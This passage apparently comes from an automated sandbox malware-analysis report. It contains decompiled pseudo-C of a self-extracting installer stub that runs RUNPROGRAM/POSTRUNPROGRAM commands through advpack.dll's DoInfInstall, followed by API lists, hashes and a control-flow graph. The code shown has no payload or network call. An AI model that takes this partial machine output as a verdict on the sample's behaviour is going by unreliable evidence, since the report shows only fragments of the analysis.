                                                                                                                                                                                                                                            											__eflags =  *0x10d9a34 & 0x00000004;
                                                                                                                                                                                                                                            											if(__eflags == 0) {
                                                                                                                                                                                                                                            												goto L57;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t129 = E010D6495(_t127, _t132, _t157, __eflags);
                                                                                                                                                                                                                                            											__eflags = _t129;
                                                                                                                                                                                                                                            											if(_t129 == 0) {
                                                                                                                                                                                                                                            												_t146 = 0x4c8;
                                                                                                                                                                                                                                            												E010D44B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                                                                                                                                                                                            												L65:
                                                                                                                                                                                                                                            												LocalFree(_v408);
                                                                                                                                                                                                                                            												 *0x10d9124 = E010D6285();
                                                                                                                                                                                                                                            												goto L62;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                                                                                                                                                                                            											_v404 = _t146;
                                                                                                                                                                                                                                            											__eflags = _t146;
                                                                                                                                                                                                                                            											if(_t146 == 0) {
                                                                                                                                                                                                                                            												_t146 = 0x4c9;
                                                                                                                                                                                                                                            												__eflags = 0;
                                                                                                                                                                                                                                            												E010D44B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                                                                                                                                                                                            												FreeLibrary(_t129);
                                                                                                                                                                                                                                            												goto L65;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags =  *0x10d8a30;
                                                                                                                                                                                                                                            											_t151 = _v408;
                                                                                                                                                                                                                                            											_v384 = 0;
                                                                                                                                                                                                                                            											_v368 =  &_v280;
                                                                                                                                                                                                                                            											_v364 =  *0x10d9a40;
                                                                                                                                                                                                                                            											_t97 =  *0x10d8a38 & 0x0000ffff;
                                                                                                                                                                                                                                            											_v380 = 0x10d9154;
                                                                                                                                                                                                                                            											_v376 = _t151;
                                                                                                                                                                                                                                            											_v372 = 0x10d91e4;
                                                                                                                                                                                                                                            											_v360 = _t97;
                                                                                                                                                                                                                                            											if( *0x10d8a30 != 0) {
                                                                                                                                                                                                                                            												_t97 = _t97 | 0x00010000;
                                                                                                                                                                                                                                            												__eflags = _t97;
                                                                                                                                                                                                                                            												_v360 = _t97;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t144 =  *0x10d9a34;
                                                                                                                                                                                                                                            											__eflags = _t144 & 0x00000008;
                                                                                                                                                                                                                                            											if((_t144 & 0x00000008) != 0) {
                                                                                                                                                                                                                                            												_t97 = _t97 | 0x00020000;
                                                                                                                                                                                                                                            												__eflags = _t97;
                                                                                                                                                                                                                                            												_v360 = _t97;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags = _t144 & 0x00000010;
                                                                                                                                                                                                                                            											if((_t144 & 0x00000010) != 0) {
                                                                                                                                                                                                                                            												_t97 = _t97 | 0x00040000;
                                                                                                                                                                                                                                            												__eflags = _t97;
                                                                                                                                                                                                                                            												_v360 = _t97;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t145 =  *0x10d8d48; // 0x0
                                                                                                                                                                                                                                            											__eflags = _t145 & 0x00000040;
                                                                                                                                                                                                                                            											if((_t145 & 0x00000040) != 0) {
                                                                                                                                                                                                                                            												_t97 = _t97 | 0x00080000;
                                                                                                                                                                                                                                            												__eflags = _t97;
                                                                                                                                                                                                                                            												_v360 = _t97;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags = _t145;
                                                                                                                                                                                                                                            											if(_t145 < 0) {
                                                                                                                                                                                                                                            												_t104 = _t97 | 0x00100000;
                                                                                                                                                                                                                                            												__eflags = _t104;
                                                                                                                                                                                                                                            												_v360 = _t104;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_v356 =  *0x10d9a38;
                                                                                                                                                                                                                                            											_t130 = _t146;
                                                                                                                                                                                                                                            											 *0x10da288( &_v384);
                                                                                                                                                                                                                                            											_t101 = _v404();
                                                                                                                                                                                                                                            											__eflags = _t164 - _t164;
                                                                                                                                                                                                                                            											if(_t164 != _t164) {
                                                                                                                                                                                                                                            												_t130 = 4;
                                                                                                                                                                                                                                            												asm("int 0x29");
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											 *0x10d9124 = _t101;
                                                                                                                                                                                                                                            											_push(_t129);
                                                                                                                                                                                                                                            											__eflags = _t101;
                                                                                                                                                                                                                                            											if(_t101 < 0) {
                                                                                                                                                                                                                                            												FreeLibrary();
                                                                                                                                                                                                                                            												goto L61;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												FreeLibrary();
                                                                                                                                                                                                                                            												_t127 = _v400;
                                                                                                                                                                                                                                            												goto L58;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										__eflags =  *0x10d9a40 - 1;
                                                                                                                                                                                                                                            										if( *0x10d9a40 == 1) {
                                                                                                                                                                                                                                            											goto L37;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										__eflags =  *0x10d8a20;
                                                                                                                                                                                                                                            										if( *0x10d8a20 == 0) {
                                                                                                                                                                                                                                            											goto L37;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										__eflags = _t157;
                                                                                                                                                                                                                                            										if(_t157 != 0) {
                                                                                                                                                                                                                                            											goto L38;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_v388 = 1;
                                                                                                                                                                                                                                            										E010D202A(_t146); // executed
                                                                                                                                                                                                                                            										goto L37;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t146 =  &_v280;
                                                                                                                                                                                                                                            									_t108 = E010D468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                                                                                                                                                                                                            									__eflags = _t108;
                                                                                                                                                                                                                                            									if(_t108 == 0) {
                                                                                                                                                                                                                                            										goto L25;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									__eflags =  *0x10d8c42;
                                                                                                                                                                                                                                            									if( *0x10d8c42 != 0) {
                                                                                                                                                                                                                                            										goto L69;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                                                                                                                                                                                                            									__eflags = _t112 == 0;
                                                                                                                                                                                                                                            									if(_t112 == 0) {
                                                                                                                                                                                                                                            										goto L69;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									goto L31;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t118 =  *0x10d8a38; // 0x0
                                                                                                                                                                                                                                            								if(_t118 == 0) {
                                                                                                                                                                                                                                            									L23:
                                                                                                                                                                                                                                            									if(_t153 != 0) {
                                                                                                                                                                                                                                            										goto L31;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t146 =  &_v276;
                                                                                                                                                                                                                                            									if(E010D468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                                                                                                                                                                                                            										goto L27;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									goto L25;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								if((_t118 & 0x00000001) == 0) {
                                                                                                                                                                                                                                            									__eflags = _t118 & 0x00000002;
                                                                                                                                                                                                                                            									if((_t118 & 0x00000002) == 0) {
                                                                                                                                                                                                                                            										goto L62;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t140 = "USRQCMD";
                                                                                                                                                                                                                                            									L20:
                                                                                                                                                                                                                                            									_t146 =  &_v276;
                                                                                                                                                                                                                                            									if(E010D468F(_t140,  &_v276, 0x104) == 0) {
                                                                                                                                                                                                                                            										goto L25;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                                                                                                                                                                                                            										_t153 = 1;
                                                                                                                                                                                                                                            										_v388 = 1;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									goto L23;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t140 = "ADMQCMD";
                                                                                                                                                                                                                                            								goto L20;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						L26:
                                                                                                                                                                                                                                            						_push(_t130);
                                                                                                                                                                                                                                            						_t146 = 0x104;
                                                                                                                                                                                                                                            						E010D1781( &_v276, 0x104, _t130, 0x10d8c42);
                                                                                                                                                                                                                                            						goto L27;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t130 = "REBOOT";
                                                                                                                                                                                                                                            				_t125 = E010D468F(_t130, 0x10d9a2c, 4);
                                                                                                                                                                                                                                            				if(_t125 == 0 || _t125 > 4) {
                                                                                                                                                                                                                                            					goto L25;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					goto L3;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}



























































                                                                                                                                                                                                                                            0x010d3baa
                                                                                                                                                                                                                                            0x010d3bb0
                                                                                                                                                                                                                                            0x010d3bb7
                                                                                                                                                                                                                                            0x010d3bc0
                                                                                                                                                                                                                                            0x010d3bc2
                                                                                                                                                                                                                                            0x010d3bc9
                                                                                                                                                                                                                                            0x010d3bcb
                                                                                                                                                                                                                                            0x010d3bcf
                                                                                                                                                                                                                                            0x010d3bd3
                                                                                                                                                                                                                                            0x010d3bd9
                                                                                                                                                                                                                                            0x010d3bfd
                                                                                                                                                                                                                                            0x010d3bfd
                                                                                                                                                                                                                                            0x010d3bff
                                                                                                                                                                                                                                            0x010d3c03
                                                                                                                                                                                                                                            0x010d3c03
                                                                                                                                                                                                                                            0x010d3c11
                                                                                                                                                                                                                                            0x010d3c16
                                                                                                                                                                                                                                            0x010d3c19
                                                                                                                                                                                                                                            0x010d3c28
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3c30
                                                                                                                                                                                                                                            0x010d3c39
                                                                                                                                                                                                                                            0x010d3c40
                                                                                                                                                                                                                                            0x010d3d13
                                                                                                                                                                                                                                            0x010d3d15
                                                                                                                                                                                                                                            0x010d3d21
                                                                                                                                                                                                                                            0x010d3d26
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3c4f
                                                                                                                                                                                                                                            0x010d3c56
                                                                                                                                                                                                                                            0x010d3c60
                                                                                                                                                                                                                                            0x010d3c65
                                                                                                                                                                                                                                            0x010d3c77
                                                                                                                                                                                                                                            0x010d3c78
                                                                                                                                                                                                                                            0x010d3c7c
                                                                                                                                                                                                                                            0x010d3c7e
                                                                                                                                                                                                                                            0x010d3c82
                                                                                                                                                                                                                                            0x010d3c82
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3c7c
                                                                                                                                                                                                                                            0x010d3c67
                                                                                                                                                                                                                                            0x010d3c69
                                                                                                                                                                                                                                            0x010d3c6d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3c58
                                                                                                                                                                                                                                            0x010d3c58
                                                                                                                                                                                                                                            0x010d3c6e
                                                                                                                                                                                                                                            0x010d3c6e
                                                                                                                                                                                                                                            0x010d3c87
                                                                                                                                                                                                                                            0x010d3c89
                                                                                                                                                                                                                                            0x010d3d4d
                                                                                                                                                                                                                                            0x010d3d4f
                                                                                                                                                                                                                                            0x010d3d50
                                                                                                                                                                                                                                            0x010d3d52
                                                                                                                                                                                                                                            0x010d3d9e
                                                                                                                                                                                                                                            0x010d3da8
                                                                                                                                                                                                                                            0x010d3daf
                                                                                                                                                                                                                                            0x010d3db4
                                                                                                                                                                                                                                            0x010d3db6
                                                                                                                                                                                                                                            0x010d3f4d
                                                                                                                                                                                                                                            0x010d3f4d
                                                                                                                                                                                                                                            0x010d3f4f
                                                                                                                                                                                                                                            0x010d3f56
                                                                                                                                                                                                                                            0x010d3f57
                                                                                                                                                                                                                                            0x010d3f58
                                                                                                                                                                                                                                            0x010d3f63
                                                                                                                                                                                                                                            0x010d3f63
                                                                                                                                                                                                                                            0x010d3dbc
                                                                                                                                                                                                                                            0x010d3dc0
                                                                                                                                                                                                                                            0x010d3dc2
                                                                                                                                                                                                                                            0x010d3de6
                                                                                                                                                                                                                                            0x010d3de6
                                                                                                                                                                                                                                            0x010d3de8
                                                                                                                                                                                                                                            0x010d3f0b
                                                                                                                                                                                                                                            0x010d3f0b
                                                                                                                                                                                                                                            0x010d3f0f
                                                                                                                                                                                                                                            0x010d3f13
                                                                                                                                                                                                                                            0x010d3f15
                                                                                                                                                                                                                                            0x010d3f1a
                                                                                                                                                                                                                                            0x010d3f1c
                                                                                                                                                                                                                                            0x010d3f46
                                                                                                                                                                                                                                            0x010d3f47
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3f47
                                                                                                                                                                                                                                            0x010d3f1e
                                                                                                                                                                                                                                            0x010d3f1f
                                                                                                                                                                                                                                            0x010d3f25
                                                                                                                                                                                                                                            0x010d3f26
                                                                                                                                                                                                                                            0x010d3f2a
                                                                                                                                                                                                                                            0x010d3f2d
                                                                                                                                                                                                                                            0x010d3fd9
                                                                                                                                                                                                                                            0x010d3fd9
                                                                                                                                                                                                                                            0x010d3fda
                                                                                                                                                                                                                                            0x010d3fda
                                                                                                                                                                                                                                            0x010d3fe1
                                                                                                                                                                                                                                            0x010d3fe3
                                                                                                                                                                                                                                            0x010d3fe3
                                                                                                                                                                                                                                            0x010d3fe8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3fe8
                                                                                                                                                                                                                                            0x010d3f33
                                                                                                                                                                                                                                            0x010d3f37
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3f37
                                                                                                                                                                                                                                            0x010d3dee
                                                                                                                                                                                                                                            0x010d3dee
                                                                                                                                                                                                                                            0x010d3df5
                                                                                                                                                                                                                                            0x010d3fad
                                                                                                                                                                                                                                            0x010d3fb9
                                                                                                                                                                                                                                            0x010d3fc2
                                                                                                                                                                                                                                            0x010d3fc8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3fc8
                                                                                                                                                                                                                                            0x010d3dfb
                                                                                                                                                                                                                                            0x010d3dfd
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3e03
                                                                                                                                                                                                                                            0x010d3e0a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3e15
                                                                                                                                                                                                                                            0x010d3e17
                                                                                                                                                                                                                                            0x010d3e19
                                                                                                                                                                                                                                            0x010d3f94
                                                                                                                                                                                                                                            0x010d3fa4
                                                                                                                                                                                                                                            0x010d3f7c
                                                                                                                                                                                                                                            0x010d3f80
                                                                                                                                                                                                                                            0x010d3f8b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3f8b
                                                                                                                                                                                                                                            0x010d3e2c
                                                                                                                                                                                                                                            0x010d3e30
                                                                                                                                                                                                                                            0x010d3e34
                                                                                                                                                                                                                                            0x010d3e36
                                                                                                                                                                                                                                            0x010d3f69
                                                                                                                                                                                                                                            0x010d3f6e
                                                                                                                                                                                                                                            0x010d3f70
                                                                                                                                                                                                                                            0x010d3f76
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3f76
                                                                                                                                                                                                                                            0x010d3e3c
                                                                                                                                                                                                                                            0x010d3e43
                                                                                                                                                                                                                                            0x010d3e47
                                                                                                                                                                                                                                            0x010d3e52
                                                                                                                                                                                                                                            0x010d3e5c
                                                                                                                                                                                                                                            0x010d3e61
                                                                                                                                                                                                                                            0x010d3e68
                                                                                                                                                                                                                                            0x010d3e70
                                                                                                                                                                                                                                            0x010d3e74
                                                                                                                                                                                                                                            0x010d3e7c
                                                                                                                                                                                                                                            0x010d3e80
                                                                                                                                                                                                                                            0x010d3e82
                                                                                                                                                                                                                                            0x010d3e82
                                                                                                                                                                                                                                            0x010d3e87
                                                                                                                                                                                                                                            0x010d3e87
                                                                                                                                                                                                                                            0x010d3e8b
                                                                                                                                                                                                                                            0x010d3e91
                                                                                                                                                                                                                                            0x010d3e94
                                                                                                                                                                                                                                            0x010d3e96
                                                                                                                                                                                                                                            0x010d3e96
                                                                                                                                                                                                                                            0x010d3e9b
                                                                                                                                                                                                                                            0x010d3e9b
                                                                                                                                                                                                                                            0x010d3e9f
                                                                                                                                                                                                                                            0x010d3ea2
                                                                                                                                                                                                                                            0x010d3ea4
                                                                                                                                                                                                                                            0x010d3ea4
                                                                                                                                                                                                                                            0x010d3ea9
                                                                                                                                                                                                                                            0x010d3ea9
                                                                                                                                                                                                                                            0x010d3ead
                                                                                                                                                                                                                                            0x010d3eb3
                                                                                                                                                                                                                                            0x010d3eb6
                                                                                                                                                                                                                                            0x010d3eb8
                                                                                                                                                                                                                                            0x010d3eb8
                                                                                                                                                                                                                                            0x010d3ebd
                                                                                                                                                                                                                                            0x010d3ebd
                                                                                                                                                                                                                                            0x010d3ec1
                                                                                                                                                                                                                                            0x010d3ec3
                                                                                                                                                                                                                                            0x010d3ec5
                                                                                                                                                                                                                                            0x010d3ec5
                                                                                                                                                                                                                                            0x010d3eca
                                                                                                                                                                                                                                            0x010d3eca
                                                                                                                                                                                                                                            0x010d3ed5
                                                                                                                                                                                                                                            0x010d3ed9
                                                                                                                                                                                                                                            0x010d3ee0
                                                                                                                                                                                                                                            0x010d3ee6
                                                                                                                                                                                                                                            0x010d3eea
                                                                                                                                                                                                                                            0x010d3eec
                                                                                                                                                                                                                                            0x010d3eee
                                                                                                                                                                                                                                            0x010d3ef3
                                                                                                                                                                                                                                            0x010d3ef3
                                                                                                                                                                                                                                            0x010d3ef5
                                                                                                                                                                                                                                            0x010d3efa
                                                                                                                                                                                                                                            0x010d3efb
                                                                                                                                                                                                                                            0x010d3efd
                                                                                                                                                                                                                                            0x010d3f40
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3eff
                                                                                                                                                                                                                                            0x010d3eff
                                                                                                                                                                                                                                            0x010d3f05
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3f05
                                                                                                                                                                                                                                            0x010d3efd
                                                                                                                                                                                                                                            0x010d3dc7
                                                                                                                                                                                                                                            0x010d3dce
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3dd0
                                                                                                                                                                                                                                            0x010d3dd7
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3dd9
                                                                                                                                                                                                                                            0x010d3ddb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3ddd
                                                                                                                                                                                                                                            0x010d3de1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3de1
                                                                                                                                                                                                                                            0x010d3d59
                                                                                                                                                                                                                                            0x010d3d65
                                                                                                                                                                                                                                            0x010d3d6a
                                                                                                                                                                                                                                            0x010d3d6c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3d6e
                                                                                                                                                                                                                                            0x010d3d75
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3d8f
                                                                                                                                                                                                                                            0x010d3d96
                                                                                                                                                                                                                                            0x010d3d98
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3d98
                                                                                                                                                                                                                                            0x010d3c8f
                                                                                                                                                                                                                                            0x010d3c98
                                                                                                                                                                                                                                            0x010d3cf1
                                                                                                                                                                                                                                            0x010d3cf3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3cfe
                                                                                                                                                                                                                                            0x010d3d11
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3d11
                                                                                                                                                                                                                                            0x010d3c9c
                                                                                                                                                                                                                                            0x010d3ca5
                                                                                                                                                                                                                                            0x010d3ca7
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3cad
                                                                                                                                                                                                                                            0x010d3cb2
                                                                                                                                                                                                                                            0x010d3cb7
                                                                                                                                                                                                                                            0x010d3cc5
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3ce8
                                                                                                                                                                                                                                            0x010d3cec
                                                                                                                                                                                                                                            0x010d3ced
                                                                                                                                                                                                                                            0x010d3ced
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3ce8
                                                                                                                                                                                                                                            0x010d3c9e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3c9e
                                                                                                                                                                                                                                            0x010d3c56
                                                                                                                                                                                                                                            0x010d3d35
                                                                                                                                                                                                                                            0x010d3d35
                                                                                                                                                                                                                                            0x010d3d3c
                                                                                                                                                                                                                                            0x010d3d48
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3d48
                                                                                                                                                                                                                                            0x010d3c03
                                                                                                                                                                                                                                            0x010d3be2
                                                                                                                                                                                                                                            0x010d3be7
                                                                                                                                                                                                                                            0x010d3bee
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 010D3C11
                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 010D3CDC
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010D46A0
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: SizeofResource.KERNEL32(00000000,00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46A9
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010D46C3
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: LoadResource.KERNEL32(00000000,00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46CC
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: LockResource.KERNEL32(00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46D3
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: memcpy_s.MSVCRT ref: 010D46E5
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46EF
                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,010D8C42), ref: 010D3D8F
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 010D3E26
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,010D8C42), ref: 010D3EFF
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,?,?,?,010D8C42), ref: 010D3F1F
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,010D8C42), ref: 010D3F40
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,?,?,?,010D8C42), ref: 010D3F47
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,010D8C42), ref: 010D3F76
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,010D8C42), ref: 010D3F80
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,010D8C42), ref: 010D3FC2
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                                                            • String ID: <None>$ADMQCMD$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll
                                                                                                                                                                                                                                            • API String ID: 1032054927-3892089904
                                                                                                                                                                                                                                            • Opcode ID: 746b6419ef69c125de663fa1deea86c6764120465f3e2f8f593d7cd4deb9d382
                                                                                                                                                                                                                                            • Instruction ID: cc407f0f22105def04b8b901db5d1f2000925f91e6a2e9cdd3585147e3582f21
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 746b6419ef69c125de663fa1deea86c6764120465f3e2f8f593d7cd4deb9d382
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F5B1CDB06093059BE770AF28D845B6B7AE4FB84704F00496EFAD5DA1C0DB7AC844CB97
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 141 10d1ae8-10d1b2c call 10d1680 144 10d1b2e-10d1b39 141->144 145 10d1b3b-10d1b40 141->145 146 10d1b46-10d1b61 call 10d1a84 144->146 145->146 149 10d1b9f-10d1bc2 call 10d1781 call 10d658a 146->149 150 10d1b63-10d1b65 146->150 159 10d1bc7-10d1bd3 call 10d66c8 149->159 151 10d1b68-10d1b6d 150->151 151->151 153 10d1b6f-10d1b74 151->153 153->149 155 10d1b76-10d1b7b 153->155 157 10d1b7d-10d1b81 155->157 158 10d1b83-10d1b86 155->158 157->158 161 10d1b8c-10d1b9d call 10d1680 157->161 158->149 162 10d1b88-10d1b8a 158->162 165 10d1bd9-10d1bf1 CompareStringA 159->165 166 10d1d73-10d1d7f call 10d66c8 159->166 161->159 162->149 162->161 165->166 168 10d1bf7-10d1c07 GetFileAttributesA 165->168 175 10d1df8-10d1e09 LocalAlloc 166->175 176 10d1d81-10d1d99 CompareStringA 166->176 170 10d1c0d-10d1c15 168->170 171 10d1d53-10d1d5e 168->171 170->171 174 10d1c1b-10d1c33 call 10d1a84 170->174 173 10d1d64-10d1d6e call 10d44b9 171->173 187 10d1e94-10d1ea4 call 10d6ce0 173->187 189 10d1c35-10d1c38 174->189 190 10d1c50-10d1c61 LocalAlloc 174->190 178 10d1e0b-10d1e1b GetFileAttributesA 175->178 179 10d1dd4-10d1ddf 175->179 176->175 181 10d1d9b-10d1da2 176->181 183 10d1e1d-10d1e1f 178->183 184 10d1e67-10d1e73 call 10d1680 178->184 179->173 186 10d1da5-10d1daa 181->186 183->184 188 10d1e21-10d1e3e call 10d1781 183->188 199 10d1e78-10d1e84 call 10d2aac 184->199 186->186 191 10d1dac-10d1db4 186->191 188->199 210 10d1e40-10d1e43 188->210 195 10d1c3a 189->195 196 10d1c40-10d1c4b call 10d1a84 189->196 190->179 198 10d1c67-10d1c72 190->198 197 10d1db7-10d1dbc 191->197 195->196 196->190 197->197 203 10d1dbe-10d1dd2 LocalAlloc 197->203 204 10d1c79-10d1cc0 GetPrivateProfileIntA GetPrivateProfileStringA 198->204 205 10d1c74 198->205 209 10d1e89-10d1e92 199->209 203->179 211 10d1de1-10d1df3 call 10d171e 203->211 207 10d1cf8-10d1d07 204->207 208 10d1cc2-10d1ccc 204->208 205->204 215 10d1d09-10d1d21 GetShortPathNameA 207->215 216 10d1d23 207->216 212 10d1cce 208->212 213 10d1cd3-10d1cf3 call 10d1680 * 2 208->213 209->187 210->199 214 10d1e45-10d1e65 call 10d16b3 * 2 210->214 211->209 212->213 213->209 214->199 220 10d1d28-10d1d2b 215->220 216->220 224 10d1d2d 220->224 225 10d1d32-10d1d4e call 10d171e 220->225 224->225 225->209
                                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                                            			E010D1AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				char _v527;
                                                                                                                                                                                                                                            				char _v528;
